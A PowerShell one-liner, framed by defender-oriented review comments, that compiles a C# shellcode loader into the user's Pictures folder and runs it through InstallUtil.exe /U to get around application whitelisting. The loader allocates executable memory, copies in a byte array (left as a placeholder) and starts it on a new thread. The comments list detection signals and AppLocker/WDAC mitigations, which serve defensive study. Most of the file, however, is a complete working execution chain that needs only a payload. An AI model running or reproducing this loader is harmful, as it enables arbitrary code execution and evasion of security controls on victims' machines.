# Review notes (defender's perspective). Despite the file's language hint, this is a PowerShell
# one-liner (wrapped across three physical lines) that emits, compiles and runs a C# program.
# What it does, as visible below:
#   1. Walks HKLM:\SOFTWARE\Microsoft\NET Framework Setup recursively, keeps every value that looks
#      like a "...Windows\Microsoft.NET\Framework..." install root, appends "csc.exe" / "InstallUtil.exe"
#      and records the paths that exist ($cscExePaths / $installUtilPaths). Registry read errors are
#      swallowed by the empty catch {} so discovery failures are silent.
#   2. Deletes and re-creates %USERPROFILE%\Pictures\program.cs via repeated Out-File -append. The
#      emitted source has a Main() that only prints an empty line; the real work is in an Installer
#      subclass whose Uninstall() override calls Shellcode.Exec(), which allocates PAGE_EXECUTE_READWRITE
#      memory with VirtualAlloc, copies a byte[] into it, starts it with CreateThread and blocks on
#      WaitForSingleObject. The byte[] is left as the "#CSHARP SHELLCODE HERE" placeholder.
#   3. Compiles with the first csc.exe found (/unsafe /platform:x86) and then launches the first
#      InstallUtil.exe found with "/U" so the Uninstall() path runs; both via Invoke-Expression.
# Detection / mitigation points a responder can key on (all derived from the commands below):
#   - Process chain powershell.exe -> csc.exe -> InstallUtil.exe, with InstallUtil command line
#     containing "/U", "/logfile=" and "/LogToConsole=False" against a binary in a user profile
#     folder (Pictures). Process-creation auditing with command-line capture (Security 4688, Sysmon
#     process create) records this; PowerShell Script Block Logging (4104) records the one-liner itself.
#   - File artifacts: program.cs written by powershell.exe and program.exe written by csc.exe under
#     %USERPROFILE%\Pictures.
#   - In-memory indicators: an RWX private allocation followed by a thread start in that region,
#     inside InstallUtil.exe.
#   - InstallUtil.exe is on Microsoft's recommended WDAC/AppLocker block list; denying it (and csc.exe)
#     for non-developer users breaks this execution path. Running program.exe directly looks benign
#     because Main() does nothing, so sandbox verdicts on the exe alone are not conclusive.
$registry = Get-ChildItem "hklm:\software\microsoft\net framework Setup\" -Recurse; $cscExePaths = @(); $installUtilPaths = @(); foreach ($a in $registry){ try { $a.Property | ForEach-Object { if ( $a.GetValue($_) -like "*Windows\Microsoft.NET\Framework*" ) { $holder1 = $a.GetValue($_); $holder1 += "csc.exe"; $holder1 = $holder1.Trim(); $holder2 = $a.GetValue($_); $holder2 += "InstallUtil.exe"; $holder2 = $holder2.Trim(); if ( Test-path($holder1) ) { if ( $cscExePaths -notcontains $holder1 ) { $cscExePaths += $holder1; } } if ( Test-path($holder2) ) { if ( $installUtilPaths -notcontains $holder2 ) { $installUtilPaths += $holder2; } } } }; } catch {} }; <# Phase 2: stage the C# source file; the single-quoted strings below are written verbatim into program.cs (one of them spans a physical line break, so the emitted source contains that newline) #> if ( Test-Path("$env:userprofile\pictures\program.cs") ) { Remove-Item "$env:userprofile\pictures\program.cs" } if ( Test-Path("$env:userprofile\pictures\program.exe") ) { Remove-Item "$env:userprofile\pictures\program.exe" } write-output 'using System; using System.Net; using System.Diagnostics; using System.Reflection; using System.Configuration.Install; using System.Runtime.InteropServices;' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output 'public class Program { public static void Main() { Console.WriteLine(""); } }' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[System.ComponentModel.RunInstaller(true)] public class Sample : System.Configuration.Install.Installer { public override void Uninstall(System.Collections.IDictionary savedState) { Shellcode.Exec(); } }' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output 'public class Shellcode { public static void Exec() {' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output 'byte[] shellcode = new byte[] { #CSHARP SHELLCODE HERE };' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output 'UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode .Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode , 0, (IntPtr)(funcAddr), shellcode .Length); IntPtr 
hThread = IntPtr.Zero; UInt32 threadId = 0;' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output 'IntPtr pinfo = IntPtr.Zero; hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); }' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output 'private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;' | Out-File "$env:userprofile\pictures\program.cs" -append ; <# The remaining write-output lines emit kernel32 P/Invoke declarations; only VirtualAlloc, CreateThread and WaitForSingleObject are actually called by Exec() above, the rest (VirtualFree, CloseHandle, GetModuleHandle, GetProcAddress, LoadLibrary, GetLastError) are declared but unused #> write-output '[DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern bool CloseHandle(IntPtr handle);' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds );' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern IntPtr GetModuleHandle( string moduleName );' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern UInt32 GetProcAddress( IntPtr hModule, string procName );' | Out-File "$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern UInt32 LoadLibrary( string lpFileName );' | Out-File 
"$env:userprofile\pictures\program.cs" -append ; write-output '[DllImport("kernel32")] private static extern UInt32 GetLastError(); }' | Out-File "$env:userprofile\pictures\program.cs" -append ; <# Phase 3: compile with the first discovered csc.exe. The command line is string-built and run through Invoke-Expression, which is itself a common hunting signal in script-block logs #> if ($cscExePaths.Length -ge 1){ $cmd = $cscExePaths[0] +" /unsafe /platform:x86 /out:$env:userprofile\pictures\program.exe $env:userprofile\pictures\program.cs"; Invoke-Expression -Command:$cmd; } else { exit; } <# Phase 4: execution. InstallUtil.exe /U loads program.exe and calls the RunInstaller-marked class's Uninstall(), which is where Shellcode.Exec() runs; /logfile= and /LogToConsole=False suppress InstallUtil's own log output #> if ( Test-Path("$env:userprofile\pictures\program.exe") ){ if ( $installUtilPaths.Length -ge 1 ) { $cmd = $installUtilPaths[0] + " /logfile= /LogToConsole=False /U $env:userprofile\pictures\program.exe"; Invoke-Expression -Command:$cmd; } else { exit; } } else { exit; }